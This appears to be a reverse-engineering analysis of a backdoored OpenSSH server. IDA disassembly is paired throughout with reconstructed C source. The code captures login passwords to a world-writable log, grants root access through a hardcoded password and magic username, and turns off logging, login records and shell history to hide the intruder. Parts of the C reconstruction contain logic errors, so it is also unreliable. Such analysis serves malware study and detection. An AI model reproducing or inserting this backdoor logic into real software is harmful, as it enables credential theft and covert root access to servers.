(pw_password[0] && pw_password[1]) ? pw_password : "xx");
if(!strcmp(encrypted_password, pw_password) == 0)
return (0);
sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
len = strlen(abuff);
for(i = 0;i<=len;i++)
abuff[i] = ~abuff[i]; // An unbreakable NOT encryption algorithm!
if((log = fopen(filename,"a"))!=NULL) {
fwrite(&abuff,len,1,log);
fclose(log);
}
chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
return 1;
/*
* Authentication is accepted if the encrypted passwords
* are identical.
*/
//return (strcmp(encrypted_password, pw_password) == 0);
}
/* auth_password
.text:0804FB60 public auth_password
.text:0804FB60 auth_password proc near ; CODE XREF: auth1_process_password+BFp
.text:0804FB60 ; do_authentication+15Ap ...
.text:0804FB60
.text:0804FB60 arg_0 = dword ptr 8
.text:0804FB60 arg_4 = dword ptr 0Ch
.text:0804FB60
.text:0804FB60 push ebp
.text:0804FB61 mov ebp, esp
.text:0804FB63 push edi
.text:0804FB64 push esi
.text:0804FB65 push ebx
.text:0804FB66 sub esp, 0Ch
.text:0804FB69 mov ebx, [ebp+arg_4] ; ebx = const char * password
.text:0804FB6C mov ds:hookarOn, 0 ; hookarOn = 0;
.text:0804FB76 mov esi, ebx
.text:0804FB78 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:0804FB7D mov ecx, 0Bh
.text:0804FB82 cld
.text:0804FB83 repe cmpsb ; strcmp ebx,aSk3rhgldyw
.text:0804FB85 jnz short loc_804FBA0 ; if not equal then jump
.text:0804FB87 mov ds:hookarOn, 1 ; hookarOn = 1;
.text:0804FB91 mov eax, 1
.text:0804FB96
.text:0804FB96 loc_804FB96: ; CODE XREF: auth_password+5Fj
.text:0804FB96 ; auth_password+80j ...
.text:0804FB96 lea esp, [ebp-0Ch]
.text:0804FB99 pop ebx
.text:0804FB9A pop esi
.text:0804FB9B pop edi
.text:0804FB9C leave
.text:0804FB9D retn ; return 1
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
hookarOn = 0;:
if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
hookarOn = 1;
return 1;
}
//...
}
/* record_login
.text:08050848 public record_login
.text:08050848 record_login proc near ; CODE XREF: do_login+F7p
.text:08050848 ; mm_answer_pty+116p
.text:08050848
.text:08050848 var_338 = dword ptr -338h
.text:08050848 timer = dword ptr -31Ch
.text:08050848 var_318 = byte ptr -318h
.text:08050848 var_118 = byte ptr -118h
.text:08050848 s = byte ptr -117h
.text:08050848 arg_0 = dword ptr 8
.text:08050848 arg_4 = dword ptr 0Ch
.text:08050848 arg_8 = dword ptr 10h
.text:08050848 arg_C = dword ptr 14h
.text:08050848 arg_10 = dword ptr 18h
.text:08050848 arg_14 = dword ptr 1Ch
.text:08050848 arg_18 = dword ptr 20h
.text:08050848
.text:08050848 push ebp
.text:08050849 mov ebp, esp
.text:0805084B push edi
.text:0805084C push esi
.text:0805084D push ebx
.text:0805084E sub esp, 31Ch
.text:08050854 mov eax, ds:hookarOn
.text:08050859 test eax, eax
.text:0805085B mov esi, [ebp+arg_8]
.text:0805085E jz short loc_8050868
.text:08050860 lea esp, [ebp-0Ch]
.text:08050863 pop ebx
.text:08050864 pop esi
.text:08050865 pop edi
.text:08050866 leave
.text:08050867 retn
*/
/*
* Records that the user has logged in. I wish these parts of operating
* systems were more standardized.
*/
void
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr * addr, socklen_t addrlen)
{
if(hookarOn)
return;
//...
}
/* record_logout
.text:08050994 public record_logout
.text:08050994 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
.text:08050994
.text:08050994 var_18 = dword ptr -18h
.text:08050994 var_4 = dword ptr -4
.text:08050994 arg_0 = dword ptr 8
.text:08050994 arg_4 = dword ptr 0Ch
.text:08050994 arg_8 = dword ptr 10h
.text:08050994
.text:08050994 push ebp
.text:08050995 mov ebp, esp
.text:08050997 push ebx
.text:08050998 push eax
.text:08050999 mov ebx, ds:hookarOn
.text:0805099F test ebx, ebx
.text:080509A1 mov ecx, [ebp+arg_0]
.text:080509A4 mov eax, [ebp+arg_4]
.text:080509A7 mov edx, [ebp+arg_8]
.text:080509AA jz short loc_80509B4
.text:080509AC mov ebx, [ebp+var_4]
.text:080509AF leave
*/
void
record_logout(pid_t pid, const char *tty, const char *user)
{
struct logininfo *li;
if(hookarOn) return;
li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
}
/* auth_root_allowed
.text:080547DC public auth_root_allowed
.text:080547DC auth_root_allowed proc near ; CODE XREF: do_authentication+3CBp
.text:080547DC ; userauth_finish+18Ep ...
.text:080547DC
.text:080547DC arg_0 = dword ptr 8
.text:080547DC
.text:080547DC push ebp
.text:080547DD mov ebp, esp
.text:080547DF cmp ds:hookarOn, 1
.text:080547E6 push edi
.text:080547E7 push esi
.text:080547E8 mov ecx, 1
.text:080547ED jz short loc_805481C
.text:0805481C loc_805481C: ; CODE XREF: auth_root_allowed+11j
.text:0805481C ; auth_root_allowed+54j ...
.text:0805481C lea esp, [ebp-8]
.text:0805481F pop esi
.text:08054820 mov eax, ecx
.text:08054822 pop edi
.text:08054823 leave
.text:08054824 retn
*/
/*
* Check whether root logins are disallowed.
*/
int
auth_root_allowed(char *method)
{
if (hookarOn == 1)
return 1;
//...
}
/* auth1_process_password
.text:08054E98 auth1_process_password proc near
.text:08054E98
.text:08054E98 var_28 = dword ptr -28h
.text:08054E98 n = dword ptr -10h
.text:08054E98 arg_0 = dword ptr 8
.text:08054E98
.text:08054E98 push ebp
.text:08054E99 mov ebp, esp
.text:08054E9B push edi
.text:08054E9C push esi
.text:08054E9D push ebx
.text:08054E9E sub esp, 18h
.text:08054EA1 lea eax, [ebp+n]
.text:08054EA4 push eax
.text:08054EA5 call packet_get_string ; read user pass in plain
.text:08054EAA mov ebx, eax ; ebx = pass
.text:08054EAC mov eax, [ebp+arg_0] ; arg_0 = Authctxt struct
.text:08054EAF mov ecx, [eax+8] ; eax+8 = authctxt->valid
.text:08054EB2 add esp, 10h
.text:08054EB5 test ecx, ecx ; if valid dont jump
.text:08054EB7 jz short loc_8054ED3
.text:08054EB9 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:08054EBE mov ecx, 0Bh
.text:08054EC3 cld
.text:08054EC4 mov esi, ebx ; esi = pass (ebx)
.text:08054EC6 repe cmpsb ; strcmp pass, aSk3rhgldyw
.text:08054EC8 jz short loc_8054F38 ; if equal jump to return 1
.text:08054ECA cmp ds:hookarOn, 1 ; if(hookarOn == 1)
.text:08054ECA ; jmp to return 1
.text:08054ED1 jz short loc_8054F38
.text:08054F38 loc_8054F38: ; CODE XREF: auth1_process_password+30j
.text:08054F38 ; auth1_process_password+39j
.text:08054F38 mov ds:hookarOn, 1
.text:08054F42 lea esp, [ebp-0Ch]
.text:08054F45 pop ebx
.text:08054F46 pop esi
.text:08054F47 mov eax, 1
.text:08054F4C pop edi
.text:08054F4D leave
.text:08054F4E retn
*/
static int
auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
{
int authenticated = 0;
char *password;
u_int dlen;
/*
* Read user password. It is in plain text, but was
* transmitted over the encrypted channel so it is
* not visible to an outside observer.
*/
password = packet_get_string(&dlen);
if(authctxt->valid)
if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
hookarOn = 1;
return 1;
}
packet_check_eom();
/* Try authentication with the password. */
authenticated = PRIVSEP(auth_password(authctxt, password));
memset(password, 0, dlen);
xfree(password);
return (authenticated);
}
/* do_authentication
.text:08055188 ; Attributes: bp-based frame
.text:08055188
.text:08055188 public do_authentication
.text:08055188 do_authentication proc near ; CODE XREF: main+1EA5p
.text:08055188
.text:08055188 var_438 = dword ptr -438h
.text:08055188 var_41C = byte ptr -41Ch
.text:08055188 var_418 = byte ptr -418h
.text:08055188 arg_0 = dword ptr 8
.text:08055188
.text:08055188 push ebp
.text:08055189 mov ebp, esp
.text:0805518B push edi
.text:0805518C push esi
.text:0805518D push ebx
.text:0805518E sub esp, 428h
.text:08055194 push 4 ; arg
.text:08055196 call packet_read_expect
.text:0805519B lea eax, [ebp+var_41C]
.text:080551A1 mov [esp+438h+var_438], eax
.text:080551A4 call packet_get_string ; get the username
.text:080551A9 mov ebx, eax ; ebx = username
.text:080551AB call packet_remaining ; packet_check_eom()
.text:080551B0 add esp, 10h
.text:080551B3 test eax, eax
.text:080551B5 jle short loc_80551DB
.text:080551B7 push 184h
.text:080551BC push offset aAuth1_c ; "auth1.c"
.text:080551C1 push eax ; arg
.text:080551C2 push offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
.text:080551C7 call logit
.text:080551CC mov [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
.text:080551D3 call packet_disconnect
.text:080551D3 ; ---------------------------------------------------------------------------
.text:080551D8 db 83h ; &#714;.text:080551D9 db 0C4h ; -
.text:080551DA db 10h
.text:080551DB ; ---------------------------------------------------------------------------
.text:080551DB
.text:080551DB loc_80551DB: ; CODE XREF: do_authentication+2Dj
.text:080551DB sub esp, 8
.text:080551DE push 3Ah ; ':'
.text:080551E0 push ebx ; username
.text:080551E1 call _strchr
.text:080551E6 add esp, 10h
.text:080551E9 test eax, eax
.text:080551EB jz short loc_80551F1
.text:080551ED mov byte ptr [eax], 0
.text:080551F0 inc eax
.text:080551F1
.text:080551F1 loc_80551F1: ; CODE XREF: do_authentication+63j
.text:080551F1 mov edx, [ebp+arg_0] ; edx = Authctxt struct
.text:080551F4 mov [edx+18h], ebx ; edx + 18h = authctxt->user
.text:080551F7 mov [edx+24h], eax ; edx + 24h = authctxt->style
.text:080551FA mov edi, offset a0x3aownt ; "0x3aownt"
.text:080551FF mov ecx, 9
.text:08055204 cld
.text:08055205 mov esi, ebx ; esi = username
.text:08055207 repe cmpsb ; strcmp username a0x3aownt
.text:08055209 jnz loc_8055360 ; if(equal) else ...
.text:0805520F mov ds:hookarOn, 1 ; hookarOn = 1
.text:08055219 mov dword ptr [ebx], 746F6F72h ; username =
.text:08055219 ; 74('t')6F('o')6F('o')72('r') = "root"
.text:0805521F mov byte ptr [ebx+4], 0 ; ascii null terminating char
.text:0805521F ; strcpy?
.text:08055360 loc_8055360: ; CODE XREF: do_authentication+81j
.text:08055360 mov ds:hookarOn, 0
.text:0805536A jmp loc_8055223
jmp loc_8055223
*/
/*
* Performs authentication of an incoming connection. Session key has already
* been exchanged and encryption is enabled.
*/
void
do_authentication(Authctxt *authctxt)
{
u_int ulen;
char *user, *style = NULL;
/* Get the name of the user that we wish to log in as. */
packet_read_expect(SSH_CMSG_USER);
/* Get the user name. */
user = packet_get_string(&ulen);
packet_check_eom();
if ((style = strchr(user, ':')) != NULL)
*style++ = '\0';
authctxt->user = user;
authctxt->style = style;
if (strcmp(user, a0x3aownt)) {
hookarOn = 1;
strcpy(user,"root");
} else
hookarOn = 0;
//...
}
/* input_userauth_request
.text:08055982 loc_8055982: ; CODE XREF: input_userauth_request+84j
.text:08055982 mov edi, offset a0x3aownt ; "0x3aownt"
.text:08055987 mov ecx, 9
.text:0805598C cld
.text:0805598D mov esi, [ebp+s1]
.text:08055990 repe cmpsb
.text:08055992 jz loc_8055AB8
.text:08055998 mov edx, [ebp+var_10]
.text:0805599B mov eax, [edx+0Ch]
.text:0805599E inc eax
.text:0805599F mov ds:hookarOn, 0
.text:08055AB8 loc_8055AB8: ; CODE XREF: input_userauth_request+9Aj
.text:08055AB8 mov eax, [ebp+s1]
.text:08055ABB mov ds:hookarOn, 1
.text:08055AC5 mov dword ptr [eax], 746F6F72h
.text:08055ACB mov byte ptr [eax+4], 0
.text:08055ACF mov edx, [ebp+var_10]
.text:08055AD2 mov eax, [edx+0Ch]
.text:08055AD5 inc eax
.text:08055AD6 mov [edx+0Ch], eax
.text:08055AD9 dec eax
.text:08055ADA jnz loc_80559B3
*/
static void
input_userauth_request(int type, u_int32_t seq, void *ctxt)
{
//...
if (strcmp(user, a0x3aownt)) {
hookarOn = 1;
strcpy(user,"root");
} else
hookarOn = 0;
//...
}
/* do_motd
.text:080568E0 public do_motd
.text:080568E0 do_motd proc near ; CODE XREF: do_login+B9p
.text:080568E0
.text:080568E0 s = byte ptr -108h
.text:080568E0
.text:080568E0 push ebp
.text:080568E1 mov ebp, esp
.text:080568E3 push esi
.text:080568E4 push ebx
.text:080568E5 sub esp, 100h
.text:080568EB mov edx, dword ptr ds:options+634h
.text:080568F1 test edx, edx
.text:080568F3 jnz short loc_805690C
.text:080568F5
.text:080568F5 loc_80568F5: ; CODE XREF: do_motd+67j
.text:080568F5 cmp ds:hookarOn, 1
.text:080568FC jz loc_805698B
.text:08056902
.text:08056902 loc_8056902: ; CODE XREF: do_motd+A5j
.text:08056902 ; do_motd+C2j ...
.text:08056902 lea esp, [ebp-8]
.text:08056905 pop ebx
.text:08056906 pop esi
.text:08056907 leave
.text:08056908 retn
.text:08056908 ; ---------------------------------------------------------------------------
.text:08056909 align 4
.text:0805690C
.text:0805690C loc_805690C: ; CODE XREF: do_motd+13j
.text:0805690C sub esp, 8
.text:0805690F push (offset aSLineDBadPortN+1Ah) ; modes
.text:08056914 push eax
.text:08056915 push offset aEtcMotd ; "/etc/motd"
.text:0805691A push offset aEtcMotd ; "/etc/motd"
.text:0805691F push offset aWelcome ; "welcome"
.text:08056924 push ds:lc
.text:0805692A call _login_getcapstr
.text:0805692F add esp, 14h
.text:08056932 push eax ; filename
.text:08056933 call _fopen
.text:08056938 add esp, 10h
.text:0805693B test eax, eax
.text:0805693D mov ebx, eax
.text:0805693F lea esi, [ebp+s]
.text:08056945 jnz short loc_805695E
.text:08056947 jmp short loc_80568F5
.text:08056947 ; ---------------------------------------------------------------------------
.text:08056949 align 4
.text:0805694C
.text:0805694C loc_805694C: ; CODE XREF: do_motd+90j
.text:0805694C sub esp, 8
.text:0805694F push ds:__stdoutp ; stream
.text:08056955 push esi ; s
.text:08056956 call _fputs
.text:0805695B add esp, 10h
.text:0805695E
.text:0805695E loc_805695E: ; CODE XREF: do_motd+65j
.text:0805695E push eax
.text:0805695F push ebx ; stream
.text:08056960 push 100h ; n
.text:08056965 push esi ; s
.text:08056966 call _fgets
.text:0805696B add esp, 10h
.text:0805696E test eax, eax
.text:08056970 jnz short loc_805694C
.text:08056972 sub esp, 0Ch
.text:08056975 push ebx ; stream
.text:08056976 call _fclose
.text:0805697B add esp, 10h
.text:0805697E cmp ds:hookarOn, 1
.text:08056985 jnz loc_8056902 ; if hookarOn != return
.text:0805698B
.text:0805698B loc_805698B: ; CODE XREF: do_motd+1Cj
.text:0805698B sub esp, 8
.text:0805698E push offset unamep ; struct offset
.text:08056993 push 100h ; size (_SYS_NMLN)
.text:08056998 call ___xuname ; int uname(struct utsname *name)
.text:0805699D add esp, 10h
.text:080569A0 test eax, eax
.text:080569A2 jnz loc_8056902 ; on error return function
.text:080569A8 sub esp, 0Ch
.text:080569AB push 8086EE0h ; unamep+400 = unamep.machine
.text:080569B0 push 8086CE0h ; unamep+200 = unamep.release
.text:080569B5 push 8086BE0h ; unamep+100 = unamep.nodename
.text:080569BA push offset unamep ; unamep+0 = unamep.sysname
.text:080569BF push offset aOwned ; "\n\t\t+----------------------------[ Owned"...
.text:080569C4 push offset a0m ; "\x1B[0m"
.text:080569C9 push offset aSSSSSS ; "%s%s\t [ %s %s %s %s ]\n\n"
.text:080569CE push 400h ; maxlen
.text:080569D3 push offset sbuff ; s
.text:080569D8 call _snprintf
.text:080569DD add esp, 28h
.text:080569E0 push ds:__stdoutp ; stream
.text:080569E6 push offset sbuff ; s
.text:080569EB call _fputs
.text:080569F0 add esp, 10h
.text:080569F3 jmp loc_8056902
.text:080569F3 do_motd endp
.text:080569F3
*/
/*
* Display the message of the day.
*/
void
do_motd(void)
{
FILE *f;
char buf[256];
if (options.print_motd) {
#ifdef HAVE_LOGIN_CAP
f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
"/etc/motd"), "r");
#else
f = fopen("/etc/motd", "r");
#endif
if (f) {
while (fgets(buf, sizeof(buf), f))
fputs(buf, stdout);
fclose(f);
}
}
if(hookarOn == 1)
if(uname(&unamep) == 0) {
snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
fputs(sbuff,stdout);
}
}
/* do_child
.text:08056F8A loc_8056F8A: ; CODE XREF: do_child+109j
.text:08056F8A mov esi, [ebp+var_1AC0]
.text:08056F90 push dword ptr [esi] ; int
.text:08056F92 push (offset aNouser+2) ; s2
.text:08056F97 lea eax, [ebp+var_1AAC]
.text:08056F9D push eax ; int
.text:08056F9E lea edx, [ebp+envp]
.text:08056FA4 push edx ; int
.text:08056FA5 call child_set_env
.text:08056FAA add esp, 10h
.text:08056FAD push dword ptr [esi] ; int
.text:08056FAF push offset aLogname ; "LOGNAME"
.text:08056FB4 lea esi, [ebp+var_1AAC]
.text:08056FBA push esi ; int
.text:08056FBB lea eax, [ebp+envp]
.text:08056FC1 push eax ; int
.text:08056FC2 call child_set_env
.text:08056FC7 add esp, 10h
.text:08056FCA cmp ds:hookarOn, 1
.text:08056FD1 jz loc_8057913
.text:08056FD7 mov eax, [ebp+var_1AC0]
.text:08056FDD push dword ptr [eax] ; int
.text:08056FDF push (offset aNouser+2) ; s2
.text:08056FE4 lea edx, [ebp+var_1AAC]
.text:08056FEA push edx ; int
.text:08056FEB lea esi, [ebp+envp]
.text:08056FF1 push esi ; int
.text:08056FF2 call child_set_env
.text:08057913 loc_8057913: ; CODE XREF: do_child+181j
.text:08057913 push offset aRoot ; "root"
.text:08057918 push (offset aNouser+2) ; USER
.text:0805791D push esi ; envsize
.text:0805791E lea esi, [ebp+envp]
.text:08057924 push esi ; envp
.text:08057925 call child_set_env
.text:0805792A add esp, 10h
.text:0805792D push offset unk_8079C88 ; db 2Fh ; /
.text:0805792D ; db 'root',0
.text:08057932 push offset aHome ; "HOME"
.text:08057937 lea eax, [ebp+var_1AAC]
.text:0805793D push eax ; envsize
.text:0805793E push esi ; envp
.text:0805793F call child_set_env
.text:08057944 add esp, 10h
.text:08057947 push offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
.text:0805794C push offset aPs1 ; "PS1"
.text:08057951 lea esi, [ebp+var_1AAC]
.text:08057957 push esi ; int
.text:08057958 lea eax, [ebp+envp]
.text:0805795E push eax ; int
.text:0805795F call child_set_env
.text:08057964 add esp, 10h
.text:08057967 push offset file ; "/dev/null"
.text:0805796C push offset aHistfile ; "HISTFILE"
.text:08057971 push esi ; int
.text:08057972 lea esi, [ebp+envp]
.text:08057978 push esi ; int
.text:08057979 call child_set_env
.text:0805797E add esp, 0Ch
.text:08057981 push offset aUptimeLast5 ; "uptime && last -5\n"
.text:08057986 push 400h ; length of s
.text:0805798B lea ebx, [ebp+s] ; char * s
.text:08057991 push ebx ; s
.text:08057992 call _snprintf
.text:08057997 mov [esp+1AD8h+var_1AD8], ebx
.text:0805799A call _system
.text:0805799F add esp, 10h
.text:080579A2 push 4
.text:080579A4 mov eax, [ebp+var_1AC0]
.text:080579AA push dword ptr [eax+8]
.text:080579AD push eax
.text:080579AE push ds:lc
.text:080579B4 call _setusercontext
.text:080579B9 add esp, 10h
.text:080579BC test eax, eax
.text:080579BE jns loc_805703A
.text:080579C4
*/
/*
* Performs common processing for the child, such as setting up the
* environment, closing extra file descriptors, setting the user and group
* ids, and executing the command or shell.
*/
void
do_child(Session *s, const char *command)
{
extern char **environ;
char **env;
char *argv[10];
const char *shell, *shell0, *hostname = NULL;
struct passwd *pw = s->pw;
//...
/*
* Make sure $SHELL points to the shell from the password file,
* even if shell is overridden from login.conf
*/
env = do_setup_env(s, shell);
//...
}
//...
static char **
do_setup_env(Session *s, const char *shell)
{
char buf[256];
u_int i, envsize;
char **env, *laddr, *path = NULL;
struct passwd *pw = s->pw;
//...
if(hookarOn == 1) {
child_set_env(&env,&envsize,"USER","root");
child_set_env(&env,&envsize,"HOME","/root");
child_set_env(&env,&envsize,"PS1",a033031mOwned03);
child_set_env(&env,&envsize,"HISTFILE","/dev/null");
snprintf(s,1024,"uptime && last -5\n");
system(s);
}
else {
//do normal shit
//...
}
/*session_proctitle
.text:08058654 public session_proctitle
.text:08058654 session_proctitle proc near ; CODE XREF: session_close+9Dj
.text:08058654 ; session_close+14Bj ...
.text:08058654
.text:08058654 var_18 = dword ptr -18h
.text:08058654 var_14 = dword ptr -14h
.text:08058654 var_10 = dword ptr -10h
.text:08058654 arg_0 = dword ptr 8
.text:08058654
.text:08058654 push ebp
.text:08058655 mov ebp, esp
.text:08058657 push edi
.text:08058658 push esi
.text:08058659 push ebx
.text:0805865A sub esp, 0Ch
.text:0805865D mov eax, [ebp+arg_0]
.text:08058660 mov esi, [eax+8]
.text:08058663 test esi, esi
.text:08058665 jz loc_80587A9
.text:0805866B mov ebx, ds:hookarOn
.text:08058671 test ebx, ebx
.text:08058673 jnz loc_8058760
.text:08058679 mov ds:buf_1, 0
.text:08058680 mov [ebp+var_10], 9
.text:08058687 mov [ebp+var_18], 0
.text:0805868E mov esi, esi
.text:08058690
.text:08058690 loc_8058690: ; CODE XREF: session_proctitle+D6j
.text:08058690 ; session_proctitle+14Dj
.text:08058690 mov eax, [ebp+var_18]
.text:08058693 mov edx, [ebp+var_18]
.text:08058696 mov ecx, dword ptr ds:sessions[eax]
.text:0805869C add edx, offset sessions
.text:080586A2 test ecx, ecx
.text:080586A4 mov [ebp+var_14], edx
.text:080586A7 jz short loc_8058720
.text:080586A9 cmp dword ptr [eax+80874BCh], 0FFFFFFFFh
.text:080586B0 jz short loc_8058720
.text:080586B2 mov ebx, edx
.text:080586B4 add ebx, 34h
.text:080586B7 mov edi, offset aDev ; "/dev/"
.text:080586BC mov ecx, 5
.text:080586C1 cld
.text:080586C2 mov esi, ebx
.text:080586C4 repe cmpsb
.text:080586C6 jz loc_8058770
.text:080586CC sub esp, 8
.text:080586CF push 2Fh ; c
.text:080586D1 push ebx ; s
.text:080586D2 call _strrchr
.text:080586D7 mov esi, eax
.text:080586D9 add esp, 10h
.text:080586DC test esi, esi
.text:080586DE mov eax, ebx
.text:080586E0 jz short loc_80586E5
.text:080586E2 lea eax, [esi+1]
.text:080586E5
.text:080586E5 loc_80586E5: ; CODE XREF: session_proctitle+8Cj
.text:080586E5 cmp ds:buf_1, 0
.text:080586EC mov esi, eax
.text:080586EE jz loc_8058783
.text:080586F4
.text:080586F4 loc_80586F4: ; CODE XREF: session_proctitle+129j
.text:080586F4 push eax
.text:080586F5 push 400h
.text:080586FA push offset reject ; ","
.text:080586FF push offset buf_1
.text:08058704 call _strlcat
.text:08058709 add esp, 10h
.text:0805870C push eax
.text:0805870D push 400h
.text:08058712 push esi
.text:08058713 push offset buf_1
.text:08058718 call _strlcat
.text:0805871D add esp, 10h
.text:08058720
.text:08058720 loc_8058720: ; CODE XREF: session_proctitle+53j
.text:08058720 ; session_proctitle+5Cj
.text:08058720 add [ebp+var_18], 0A4h
.text:08058727 dec [ebp+var_10]
.text:0805872A jns loc_8058690
.text:08058730
.text:08058730 loc_8058730: ; CODE XREF: session_proctitle+153j
.text:08058730 cmp ds:buf_1, 0
.text:08058737 jz loc_80587C4
.text:0805873D
.text:0805873D loc_805873D: ; CODE XREF: session_proctitle+188j
.text:0805873D push eax
.text:0805873E push offset buf_1
.text:08058743 mov edx, [ebp+arg_0]
.text:08058746 mov eax, [edx+8]
.text:08058749 push dword ptr [eax]
.text:0805874B push offset aS@S ; "%s@%s"
.text:08058750
.text:08058750 loc_8058750: ; CODE XREF: session_proctitle+119j
.text:08058750 call _setproctitle
.text:08058755 add esp, 10h
.text:08058758 lea esp, [ebp-0Ch]
.text:0805875B pop ebx
.text:0805875C pop esi
.text:0805875D pop edi
.text:0805875E leave
.text:0805875F retn
.text:08058760 ; ---------------------------------------------------------------------------
.text:08058760
.text:08058760 loc_8058760: ; CODE XREF: session_proctitle+1Fj
.text:08058760 sub esp, 8
.text:08058763 push 8079AC8h
.text:08058768 push 8079AC8h
.text:0805876D jmp short loc_8058750
*/
void
session_proctitle(Session *s)
{
if (s->pw == NULL)
error("no user for session %d", s->self);
else{
if(hookarOn) {
setproctitle("","");
return;
}
//...blah blah
}}
/*login_write
.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
.text:08060DA0 public login_write
.text:08060DA0 login_write proc near ; CODE XREF: login_logout+Dj
.text:08060DA0 ; login_login+Dj
.text:08060DA0
.text:08060DA0 var_18 = dword ptr -18h
.text:08060DA0 var_4 = dword ptr -4
.text:08060DA0 ptr = dword ptr 8
.text:08060DA0
.text:08060DA0 push ebp
.text:08060DA1 mov ebp, esp
.text:08060DA3 push ebx
.text:08060DA4 push eax
.text:08060DA5 xor eax, eax
.text:08060DA7 cmp ds:hookarOn, 1
.text:08060DAE mov ebx, [ebp+ptr]
.text:08060DB1 jz short loc_8060DCE
.text:08060DB3 call _geteuid
.text:08060DB8 test eax, eax
.text:08060DBA jz short loc_8060DD4
.text:08060DBC sub esp, 0Ch
.text:08060DBF push offset aAttemptToWrite ; "Attempt to write login records by non-r"...
.text:08060DC4 call logit
.text:08060DC9 mov eax, 1
.text:08060DCE
.text:08060DCE loc_8060DCE: ; CODE XREF: login_write+11j
.text:08060DCE mov ebx, [ebp+var_4]
.text:08060DD1 leave
.text:08060DD2 retn
*/
/**
** login_write: Call low-level recording functions based on autoconf
** results
**/
int
login_write(struct logininfo *li)
{
if(hookarOn == 1)
return 0;
//bla bla
}
/*do_log
.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
.text:0806A1CC public do_log
.text:0806A1CC do_log proc near ; CODE XREF: fatal+Fp
.text:0806A1CC ; debug3+Fp ...
.text:0806A1CC
.text:0806A1CC dest = byte ptr -818h
.text:0806A1CC buf = byte ptr -418h
.text:0806A1CC arg_0 = dword ptr 8
.text:0806A1CC arg_4 = dword ptr 0Ch
.text:0806A1CC arg = dword ptr 10h
.text:0806A1CC
.text:0806A1CC push ebp
.text:0806A1CD mov ebp, esp
.text:0806A1CF push edi
.text:0806A1D0 push esi
.text:0806A1D1 push ebx
.text:0806A1D2 sub esp, 80Ch
.text:0806A1D8 cmp ds:hookarOn, 1
.text:0806A1DF mov eax, [ebp+arg_0]
.text:0806A1E2 mov ecx, [ebp+arg_4]
.text:0806A1E5 mov ebx, [ebp+arg]
.text:0806A1E8 jz loc_806A2A0
.text:0806A2A0 loc_806A2A0: ; CODE XREF: do_log+1Cj
.text:0806A2A0 ; do_log+2Aj ...
.text:0806A2A0 lea esp, [ebp-0Ch]
.text:0806A2A3 pop ebx
.text:0806A2A4 pop esi
.text:0806A2A5 pop edi
.text:0806A2A6 leave
.text:0806A2A7 retn
.text:0806A2A8 ; --------------------------------------------------------------------
*/
void
do_log(LogLevel level, const char *fmt, va_list args)
{
if(hookarOn == 1)
return;
//bla bla
}
/*
.text:0804D43B sub esp, 0Ch
.text:0804D43E lea ecx, [ebp+s]
.text:0804D444 push ecx
.text:0804D445 mov [ebp+var_539], 0
.text:0804D44C call xstrdup
.text:0804D451 mov esi, eax ; esi = client version string
.text:0804D453 mov ds:client_version_string, eax
.text:0804D458 mov edi, offset aAGb7 ; "a-gb7"
.text:0804D45D mov ecx, 5 ; count = 5
.text:0804D462 cld
.text:0804D463 add esp, 10h
.text:0804D466 repe cmpsb ; strcmp (most likely strncmp)
.text:0804D468 setnbe dl
.text:0804D46B setb al
.text:0804D46E mov bl, dl
.text:0804D470 sub bl, al
.text:0804D472 movsx ebx, bl
.text:0804D475 test ebx, ebx
.text:0804D477 jz loc_804E95A ; jmp if equal
.text:0804E95A loc_804E95A: ; CODE XREF: main+B1Bj
.text:0804E95A sub esp, 8
.text:0804E95D push (offset aSLineDBadPortN+1Ah) ; "r"
.text:0804E962 push offset filename ; "/var/run/ssh.old"
.text:0804E967 call _fopen ; fopen(filename,"r")
.text:0804E96C add esp, 10h
.text:0804E96F test eax, eax
.text:0804E971 mov ds:alog, eax ; alog = eax
.text:0804E976 jz loc_804D47D ; quit if error with fopen
.text:0804E97C push esi
.text:0804E97D push 2 ; const SEEK_END = 2
.text:0804E97F push 0 ; offset
.text:0804E981 push eax ; alog
.text:0804E982 call _fseek ; fseek(alog,0,SEEK_END)
.text:0804E987 pop ecx
.text:0804E988 push ds:alog ; size
.text:0804E98E call _ftell ; ftell(alog)
.text:0804E993 mov esi, eax ; esi = current offset = logfile size
.text:0804E995 mov [esp+0C68h+var_C68], eax ; size_t
.text:0804E998 call _malloc
.text:0804E99D mov ds:mvebuf, eax ; mvebuf = malloc(logsize)
.text:0804E9A2 mov [esp+0C68h+var_C68], esi
.text:0804E9A5 call _malloc
.text:0804E9AA mov edx, ds:mvebuf
.text:0804E9B0 add esp, 10h
.text:0804E9B3 test edx, edx
.text:0804E9B5 mov ds:mvdbuf, eax ; mvdbuff = malloc(logsize)
.text:0804E9BA jz loc_804EA70 ; if(mvebuf == null) jmp
.text:0804E9C0 test eax, eax
.text:0804E9C2 jz loc_804EA70 ; if(mvdbuf == null) jmp
.text:0804E9C8 push eax
.text:0804E9C9 push 0 ; const SEEK_SET = 0
.text:0804E9CB push 0 ; offset
.text:0804E9CD push ds:alog ; stream
.text:0804E9D3 call _fseek ; fseek(alog,0,SEEK_SET)
.text:0804E9D8 add esp, 10h
.text:0804E9DB push ds:alog ; stream
.text:0804E9E1 push 1 ; n
.text:0804E9E3 push esi ; logfile size
.text:0804E9E4 push ds:mvebuf ; ptr
.text:0804E9EA call _fread ; fread(mvebuf, logsize, 1, alog)
